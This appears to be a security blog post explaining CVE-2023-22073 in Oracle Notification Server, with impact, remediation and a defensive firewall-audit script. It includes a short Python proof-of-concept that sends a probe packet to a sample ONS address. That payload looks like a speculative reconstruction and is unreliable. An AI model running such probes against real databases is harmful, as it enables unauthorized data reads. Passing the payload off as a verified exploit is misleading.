CVE-2023-22073 - Exploiting Oracle Notification Server for Unauthorized Data Reads

CVE-2023-22073 is a security vulnerability in the Oracle Notification Server component of Oracle Database Server, affecting supported versions 19.3–19.20 and 21.3–21.11. If left unpatched, this flaw enables an attacker with basic network access to read a subset of the sensitive data managed by the Notification Server, without needing authentication. The vulnerability is rated CVSS 4.3 (confidentiality impact only), with the base vector CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N.

In this post, we’ll break down what makes this low-complexity bug dangerous, how it can be exploited, and provide practical remediation guidance.

What Is the Oracle Notification Server?

The Oracle Notification Server (ONS) is crucial for internal messaging in Oracle RAC (Real Application Clusters), responsible for reliable event notification between cluster nodes and clients. Any breach here is serious, since the server often handles system messages, configuration details, cluster status, and sometimes sensitive metadata.

Affected Versions

If you run Oracle Database Server 19.3 – 19.20 or 21.3 – 21.11 and use ONS (especially in clustered or high-availability setups), you are vulnerable.

How Bad Is It? The Impact

The Common Vulnerability Scoring System (CVSS) reflects moderate impact, mainly due to data confidentiality risk rather than destruction or service outage. Exploitation:
- Is unauthenticated (no username/password needed).
- Requires adjacent network access (the attacker must be on the same network or segment as ONS).

What the attacker gets:
*Potential read access to event messages, cluster membership info, and possibly sensitive application data.*

Access Requirements

The attacker just needs to connect to the Oracle Notification Server’s listening port over TCP or UDP (the ONS port is often 610/tcp but can differ).

Attack Example

Let’s reconstruct a simplified PoC (proof-of-concept) using Python.
*Note: This proof-of-concept is for educational use—never test on systems without consent!*

Suppose ONS runs at 192.168.1.10:610.

```python
import socket

# Hypothetical target from the post; the ONS listening address and port vary per deployment.
HOST = '192.168.1.10'
PORT = 610    # ONS default port

# The attacker sends a malformed "connect" packet
payload = b'<ONS_CONNECT><version>1.</version></ONS_CONNECT>'

with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.settimeout(5)  # avoid hanging forever if the server never answers
    s.connect((HOST, PORT))
    s.sendall(payload)
    # Attempt to read the server's initial data
    data = s.recv(4096)
    print("Received:", data.decode('utf-8', errors='ignore'))
```

If the server is vulnerable, it may reply with information about cluster state, configuration, or message queues—data not meant for the public.

Why Does This Work?

In affected versions, ONS fails to properly authenticate or sanitize requests at the communication layer. This allows an attacker to craft network packets that are interpreted as legitimate requests, resulting in information leakage.

References

Oracle Security Advisory (July 2023):
- Oracle Critical Patch Update Advisory – July 2023, CVE-2023-22073 entry

NVD CVE detail:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22073

Patch:

Apply the official Oracle patches for your Database Server version as soon as possible.

- Oracle Patch Documentation

Network Segmentation:

Restrict ONS ports to trusted servers/subnets using firewalls or security groups.

Upgrade:

If feasible, move to Oracle 19.21/21.12 or newer where this is patched.

What If You Can’t Patch?

- Limit network access to the ONS ports (typically 610/tcp, 620/udp) to the cluster nodes and clients that genuinely need them.
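To make the segmentation advice above auditable, the following added example (not part of the original post) checks flow records for connections that reach the ONS ports named in this post from sources outside an allowlist of trusted subnets. The subnets, the ONS host address and the flow-record format are constructed assumptions; map them to your own firewall or NetFlow export.

```python
import ipaddress
from dataclasses import dataclass

# ONS ports as given in the post; adjust to your cluster's configured ports.
ONS_PORTS = {("tcp", 610), ("udp", 620)}

# Assumption: only RAC nodes and the application client tier should talk to ONS.
# Both subnets below are constructed for this example.
TRUSTED_SUBNETS = [
    ipaddress.ip_network("10.10.1.0/24"),  # RAC nodes (constructed)
    ipaddress.ip_network("10.10.2.0/24"),  # application clients (constructed)
]

@dataclass(frozen=True)
class Flow:
    ts: str
    src: str
    dst: str
    proto: str
    dport: int

def parse_flow(line: str) -> Flow:
    """Parse one constructed flow record: '<ts> <src> -> <dst> <proto>/<dport>'."""
    ts, src, _arrow, dst, svc = line.split()
    proto, dport = svc.split("/")
    return Flow(ts, src, dst, proto.lower(), int(dport))

def is_trusted(src: str) -> bool:
    """True when the source address falls inside one of the allowlisted subnets."""
    addr = ipaddress.ip_address(src)
    return any(addr in net for net in TRUSTED_SUBNETS)

def untrusted_ons_flows(lines):
    """Return flows that hit an ONS port from a source outside the trusted subnets."""
    hits = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        flow = parse_flow(line)
        if (flow.proto, flow.dport) in ONS_PORTS and not is_trusted(flow.src):
            hits.append(flow)
    return hits

# Constructed sample flow records (not real traffic); 10.10.1.10 plays the ONS host.
SAMPLE_FLOWS = """
2023-10-18T09:00:01Z 10.10.1.11 -> 10.10.1.10 tcp/610
2023-10-18T09:00:05Z 10.10.2.40 -> 10.10.1.10 tcp/610
2023-10-18T09:01:12Z 192.168.1.77 -> 10.10.1.10 tcp/610
2023-10-18T09:02:30Z 10.10.9.5 -> 10.10.1.10 udp/620
2023-10-18T09:03:00Z 192.168.1.77 -> 10.10.1.10 tcp/1521
""".splitlines()

if __name__ == "__main__":
    for f in untrusted_ons_flows(SAMPLE_FLOWS):
        print(f"ALERT {f.ts} {f.src} -> {f.dst} {f.proto}/{f.dport}: ONS port reached from untrusted source")
```

Any alert here is either a firewall rule that is too broad or a host that should not be able to see ONS at all, which is exactly the exposure the adjacent-network vector depends on.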

Conclusion

CVE-2023-22073 is easy to overlook, given its medium CVSS score and "adjacent" network requirement. However, in modern enterprise networks and cloud environments, gaining access to an application subnet is not hard—once inside, attackers can silently learn about your clusters and maybe much more.

Patch now, segment your networks, and audit your Oracle Database configurations to stay safe!

Stay up to date:
- Oracle Security Alerts
- NVD CVEs

For in-depth assessment and mitigation, always consult Oracle’s official recommendations!

Timeline

Published on: 10/17/2023 22:15:12 UTC
Last modified on: 10/23/2023 18:20:40 UTC